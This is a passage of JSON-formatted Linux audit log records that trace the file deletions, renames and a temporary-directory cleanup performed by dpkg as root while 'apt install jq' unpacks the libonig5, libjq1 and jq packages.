"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.001:687",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x1b6"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/man/",
"inode": 4459,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.001:688",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x1b6"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/man/man1/",
"inode": 7747,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.001:689",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x1b6"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/jq/",
"inode": 808432,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.001:690",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x1b6"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/jq/",
"inode": 808432,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.001:691",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba29b7e0",
"0x556eba29b810",
"0x556eba29b82a",
"0x556eb8dc8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/lib/dpkg/updates/tmp.i",
"inode": 277194,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/lib/dpkg/updates/0010",
"inode": 277194,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.005:692",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-39",
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba9334b0",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x1"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/",
"inode": 11655,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/tmp.ci",
"inode": 276984,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.005:693",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7624,
"pid": 7651,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "rootcmd",
"ARGV": [
"0x7ffef7ae4660",
"0x7ffef7ae4720",
"0x556eba29b570",
"0x7ffef7ae4770"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/sbin/rm",
"nametype": "UNKNOWN",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb"
],
"launch_time": 1632470477.697,
"ppid": 7575
}
}
{
"ID": "1632470478.005:694",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7624,
"pid": 7651,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "rm",
"exe": "/usr/bin/rm",
"key": "rootcmd",
"ARGV": [
"0x7ffef7ae4660",
"0x7ffef7ae4720",
"0x556eba29b570",
"0x7ffef7ae4770"
]
},
"EXECVE": {
"argc": 4,
"ARGV": [
"rm",
"-rf",
"--",
"/var/lib/dpkg/tmp.ci"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/rm",
"inode": 787363,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb"
],
"launch_time": 1632470477.697,
"ppid": 7575
}
}
{
"ID": "1632470478.005:695",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 263,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7624,
"pid": 7651,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "rm",
"exe": "/usr/bin/rm",
"key": "delete",
"ARGV": [
"0x4",
"0x561a4bad6938",
"0x0",
"0x0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/",
"inode": 276984,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "control",
"inode": 276990,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb"
],
"launch_time": 1632470477.697,
"ppid": 7575
}
}
{
"ID": "1632470478.005:696",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 263,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7624,
"pid": 7651,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "rm",
"exe": "/usr/bin/rm",
"key": "delete",
"ARGV": [
"0xffffff9c",
"0x561a4bad54d0",
"0x200",
"0x1"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/",
"inode": 11655,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/tmp.ci",
"inode": 276984,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb"
],
"launch_time": 1632470477.697,
"ppid": 7575
}
}
{
"ID": "1632470478.005:697",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba44bc70",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/",
"inode": 11655,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.005:698",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 91,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "perm_mod",
"ARGV": [
"0xa",
"0x1a4",
"0x0",
"0x1b6"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 14216,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.017:699",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba59cec0",
"0x556eba29b840",
"0x556ebae89dd0",
"0x556eb8dc697d"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/",
"inode": 11655,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/status-old",
"inode": 14215,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.017:700",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 5,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba4a8a50",
"0x556ebaf27090",
"0x556eba5205b0",
"0x556eb8dc697d"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/",
"inode": 11655,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/",
"inode": 11655,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/lib/dpkg/status-new",
"inode": 14216,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/lib/dpkg/status",
"inode": 14163,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 4,
"name": "/var/lib/dpkg/status",
"inode": 14216,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.021:701",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba29b810",
"0x556eb8dc8797",
"0x556eba29b826",
"0x556eb8dc8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/0000",
"inode": 276936,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.021:702",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba29b810",
"0x556eb8dc8797",
"0x556eba29b826",
"0x556eb8dc8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/0001",
"inode": 277010,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.021:703",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba29b810",
"0x556eb8dc8797",
"0x556eba29b826",
"0x556eb8dc8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/0002",
"inode": 277011,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470478.021:704",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba29b810",
"0x556eb8dc8797",
"0x556eba29b826",
"0x556eb8dc8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/0003",
"inode": 277162,
"dev": "fd:00",
"mode": "0o100644",
